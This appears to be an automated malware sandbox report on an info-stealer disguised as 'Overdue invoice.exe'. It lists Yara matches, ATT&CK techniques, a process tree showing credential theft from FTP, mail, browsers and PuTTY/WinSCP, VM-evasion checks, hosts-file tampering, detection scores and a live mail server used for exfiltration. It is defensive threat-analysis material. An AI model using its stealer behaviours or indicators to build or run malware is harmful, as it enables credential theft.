Source: Yara match; File source: 0.2.Overdue invoice.exe.3ac2e78.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Overdue invoice.exe.39de3f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000013.00000000.366458580.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000000.294988702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000000.295945880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000000.366994504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000000.295465407.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000000.294210578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.378013888.0000000003CEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000000.365073156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000000.365965578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000002.519516875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.302129408.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.373874318.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.300706050.000000000393F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Overdue invoice.exe PID: 6504, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: Overdue invoice.exe PID: 7140, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: yqWDN.exe PID: 5496, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: yqWDN.exe PID: 7048, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: yqWDN.exe PID: 5572, type: MEMORYSTR
MITRE ATT&CK Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 2 1 1 Windows Management Instrumentation | 1 Scheduled Task/Job | 1 1 1 Process Injection | 1 File and Directory Permissions Modification | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 1 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | 1 Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 1 Disable or Modify Tools | 1 Input Capture | 1 1 4 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | Exfiltration Over Bluetooth | 1 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 1 Deobfuscate/Decode Files or Information | 1 Credentials in Registry | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 2 Obfuscated Files or Information | NTDS | 3 1 1 Security Software Discovery | Distributed Component Object Model | 1 Input Capture | Scheduled Transfer | 1 1 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 3 Software Packing | LSA Secrets | 1 Process Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Masquerading | Cached Domain Credentials | 1 3 1 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 3 1 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 1 1 Process Injection | Proc Filesystem | 1 Remote System Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Hidden Files and Directories | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
Behavior Graph ID: 635084; Sample: Overdue invoice.exe; Start date: 27/05/2022; Architecture: WINDOWS; Score: 100

Top-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures

Process tree (recovered from the behavior graph):

Overdue invoice.exe (started)
  Dropped: C:\Users\user\AppData\...\dYXeRswtYBrq.exe (PE32); C:\Users\user\AppData\Local\...\tmpA306.tmp (XML); C:\Users\user\...\Overdue invoice.exe.log (ASCII)
  Signature: Injects a PE file into a foreign processes
  Started: Overdue invoice.exe; schtasks.exe; Overdue invoice.exe
    Overdue invoice.exe (child)
      DNS/IP: mail.jkudyog.com 206.183.111.188, ports 49715, 49745, 587, WEBWERKS-AS-INWebWerksIndiaPvtLtdIN, United States
      Dropped: C:\Users\user\AppData\Roaming\...\yqWDN.exe (PE32); C:\Windows\System32\drivers\etc\hosts (ASCII); C:\Users\user\...\yqWDN.exe:Zone.Identifier (ASCII)
      Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Modifies the hosts file; Hides that the sample has been downloaded from the Internet (zone.identifier)
    schtasks.exe
      Started: conhost.exe
yqWDN.exe (started)
  DNS/IP: 192.168.2.1 unknown unknown
  Signatures: Multi AV Scanner detection for dropped file; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file; Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
  Started: yqWDN.exe; schtasks.exe
    yqWDN.exe (child)
      Signatures: Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
    schtasks.exe
      Started: conhost.exe
yqWDN.exe (started, second instance)

Source | Detection | Scanner | Label
Overdue invoice.exe | 61% | Virustotal |
Overdue invoice.exe | 60% | ReversingLabs | ByteCode-MSIL.Trojan.RealProtect
Overdue invoice.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\dYXeRswtYBrq.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\dYXeRswtYBrq.exe | 60% | ReversingLabs | ByteCode-MSIL.Trojan.RealProtect
C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | 60% | ReversingLabs | ByteCode-MSIL.Trojan.RealProtect

Source | Detection | Scanner | Label
19.0.yqWDN.exe.400000.6.unpack | 100% | Avira | TR/Spy.Gen8
19.0.yqWDN.exe.400000.8.unpack | 100% | Avira | TR/Spy.Gen8
7.0.Overdue invoice.exe.400000.10.unpack | 100% | Avira | TR/Spy.Gen8
7.0.Overdue invoice.exe.400000.6.unpack | 100% | Avira | TR/Spy.Gen8
7.0.Overdue invoice.exe.400000.12.unpack | 100% | Avira | TR/Spy.Gen8
19.0.yqWDN.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8
19.2.yqWDN.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
19.0.yqWDN.exe.400000.10.unpack | 100% | Avira | TR/Spy.Gen8
7.2.Overdue invoice.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
7.0.Overdue invoice.exe.400000.8.unpack | 100% | Avira | TR/Spy.Gen8
19.0.yqWDN.exe.400000.12.unpack | 100% | Avira | TR/Spy.Gen8
7.0.Overdue invoice.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8

Source | Detection | Scanner | Label
mail.jkudyog.com | 1% | Virustotal |
Source | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.founder.com.cn/cn//: | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.fontbureau.comepko | 0% | URL Reputation | safe
http://www.fontbureau.comessed | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://mail.jkudyog.com | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cnoO | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
https://I323GyXsTwT8KsWsK7L.net1-5-21-3853321935-21255632 | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi | 0% | URL Reputation | safe
http://www.fonts.comn | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.urwpp.depA | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/l | 0% | Avira URL Cloud | safe
http://www.fontbureau.comttoF | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.urwpp.de | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.fontbureau.com= | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr= | 0% | Avira URL Cloud | safe
http://www.fontbureau.comlicF | 0% | URL Reputation | safe
https://I323GyXsTwT8KsWsK7L.net8 | 0% | Avira URL Cloud | safe
http://www.agfamonotype. | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | 0% | URL Reputation | safe
http://www.founder.com.cn/cnt-ia | 0% | Avira URL Cloud | safe
http://www.fontbureau.comoGC | 0% | Avira URL Cloud | safe
http://www.fontbureau.comdc | 0% | Avira URL Cloud | safe
http://dWZLeu.com | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr$A | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cnz | 0% | URL Reputation | safe
http://www.fontbureau.comd | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.sandoll.co.krF1 | 0% | Avira URL Cloud | safe
http://www.fontbureau.comB.TTFlC | 0% | Avira URL Cloud | safe
https://I323GyXsTwT8KsWsK7L.net | 0% | Avira URL Cloud | safe
http://www.fontbureau.comm | 0% | URL Reputation | safe
http://www.founder.com.cn/cne-d | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.fontbureau.como | 0% | URL Reputation | safe
http://www.fontbureau.comals | 0% | URL Reputation | safe
http://www.tiro.comh | 0% | URL Reputation | safe
http://www.tiro.comc | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.jkudyog.com | 206.183.111.188 | true | true | | unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://127.0.0.1:HTTP/1.1Overdue invoice.exe, 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    http://www.fontbureau.com/designersGOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.fontbureau.com/designers/?Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.founder.com.cn/cn/bTheOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.com/designers?Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.fontbureau.com/3COverdue invoice.exe, 00000000.00000003.259988892.0000000005908000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.founder.com.cn/cn//:Overdue invoice.exe, 00000000.00000003.254870128.0000000005904000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.tiro.comOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253859484.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253816400.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253303468.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253356717.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253456642.000000000591B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designersOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.comepkoOverdue invoice.exe, 00000000.00000003.297172527.0000000005900000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000002.303053432.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.comessedOverdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.goodfont.co.krOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://mail.jkudyog.comOverdue invoice.exe, 00000007.00000002.522968890.0000000003760000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000013.00000002.523253401.000000000339C000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.founder.com.cn/cnoOOverdue invoice.exe, 00000000.00000003.254629796.0000000005904000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.254953312.000000000590B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.254870128.0000000005904000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.sajatypeworks.comOverdue invoice.exe, 00000000.00000003.252984688.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252856713.0000000005920000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252888263.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253011774.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252782511.0000000005920000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253067018.0000000005924000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253045863.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252808922.0000000005920000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253078124.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253115594.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252958098.000000000591E000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.typography.netDOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.founder.com.cn/cn/cTheOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.galapagosdesign.com/staff/dennis.htmOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://fontfabrik.comOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://I323GyXsTwT8KsWsK7L.net1-5-21-3853321935-21255632Overdue invoice.exe, 00000007.00000003.315746874.00000000011D4000.00000004.00000020.00020000.00000000.sdmpfalse
  Antivirus Detection: Avira URL Cloud: safe
  Reputation: unknown

URL: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
  Source: yqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

URL: http://www.fonts.comn
  Source: Overdue invoice.exe, 00000000.00000003.253007661.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253040437.000000000591B000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

URL: http://www.galapagosdesign.com/DPlease
  Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

URL: http://www.urwpp.depA
  Source: Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: Avira URL Cloud: safe
  Reputation: unknown

URL: http://www.founder.com.cn/cn/l
  Source: Overdue invoice.exe, 00000000.00000003.254870128.0000000005904000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: Avira URL Cloud: safe
  Reputation: unknown

URL: http://www.fontbureau.comttoF
  Source: Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: Avira URL Cloud: safe
  Reputation: unknown

URL: http://www.fonts.com
  Source: Overdue invoice.exe, 00000000.00000003.253045863.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253078124.000000000591B000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Reputation: high

URL: http://www.sandoll.co.kr
  Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

URL: http://www.urwpp.deDPlease
  Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

URL: http://www.urwpp.de
  Source: Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

URL: http://www.zhongyicts.com.cn
  Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown
URL: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
  Source: Overdue invoice.exe, 00000000.00000002.298765029.000000000294E000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 0000000F.00000002.373514445.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Reputation: high

URL: http://www.sakkal.com
  Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

URL: http://www.fontbureau.com=
  Source: Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: Avira URL Cloud: safe
  Reputation: low

URL: http://www.sandoll.co.kr=
  Source: Overdue invoice.exe, 00000000.00000003.254081305.0000000005906000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: Avira URL Cloud: safe
  Reputation: low

URL: http://www.fontbureau.comlicF
  Source: Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

URL: http://www.apache.org/licenses/LICENSE-2.0
  Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Reputation: high

URL: http://www.fontbureau.com
  Source: Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Reputation: high

URL: https://I323GyXsTwT8KsWsK7L.net8
  Source: Overdue invoice.exe, 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: Avira URL Cloud: safe
  Reputation: unknown

URL: http://www.agfamonotype.
  Source: Overdue invoice.exe, 00000000.00000003.265415364.000000000590A000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

URL: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
  Source: Overdue invoice.exe, 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

URL: http://www.founder.com.cn/cnt-ia
  Source: Overdue invoice.exe, 00000000.00000003.254612717.000000000593D000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: Avira URL Cloud: safe
  Reputation: unknown

URL: http://www.fontbureau.comoGC
  Source: Overdue invoice.exe, 00000000.00000003.297172527.0000000005900000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000002.303053432.0000000005900000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: Avira URL Cloud: safe
  Reputation: unknown

URL: http://www.fontbureau.comdc
  Source: Overdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: Avira URL Cloud: safe
  Reputation: unknown
URL: http://dWZLeu.com
  Source: yqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: Avira URL Cloud: safe
  Reputation: unknown

URL: http://www.sandoll.co.kr$A
  Source: Overdue invoice.exe, 00000000.00000003.254081305.0000000005906000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: Avira URL Cloud: safe
  Reputation: low

URL: http://www.founder.com.cn/cnz
  Source: Overdue invoice.exe, 00000000.00000003.254612717.000000000593D000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

URL: http://www.fontbureau.comd
  Source: Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

URL: http://www.carterandcone.coml
  Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

URL: http://www.fontbureau.com/designers/cabarga.htmlN
  Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Reputation: high

URL: http://www.founder.com.cn/cn
  Source: Overdue invoice.exe, 00000000.00000003.254629796.0000000005904000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.254612717.000000000593D000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.254870128.0000000005904000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

URL: http://www.fontbureau.com/designers/frere-jones.html
  Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Reputation: high

URL: http://www.sandoll.co.krF1
  Source: Overdue invoice.exe, 00000000.00000003.254081305.0000000005906000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: Avira URL Cloud: safe
  Reputation: unknown

URL: http://www.fontbureau.com/designers/cabarga.htmlP
  Source: Overdue invoice.exe, 00000000.00000003.260820341.0000000005935000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Reputation: high

URL: http://www.fontbureau.com/designers/cabarga.html
  Source: Overdue invoice.exe, 00000000.00000003.260820341.0000000005935000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260841728.0000000005935000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Reputation: high

URL: http://www.fontbureau.comB.TTFlC
  Source: Overdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: Avira URL Cloud: safe
  Reputation: unknown

URL: https://I323GyXsTwT8KsWsK7L.net
  Source: yqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000013.00000002.523253401.000000000339C000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: Avira URL Cloud: safe
  Reputation: unknown
URL: http://www.fontbureau.comm
  Source: Overdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

URL: http://www.founder.com.cn/cne-d
  Source: Overdue invoice.exe, 00000000.00000003.254612717.000000000593D000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

URL: http://www.jiyu-kobo.co.jp/
  Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

URL: http://www.fontbureau.como
  Source: Overdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

URL: http://www.fontbureau.com/designers8
  Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Reputation: high

URL: http://www.fontbureau.comdC
  Source: Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Reputation: unknown

URL: http://www.fontbureau.comals
  Source: Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

URL: http://www.tiro.comh
  Source: Overdue invoice.exe, 00000000.00000003.253303468.000000000591B000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

URL: http://www.tiro.comc
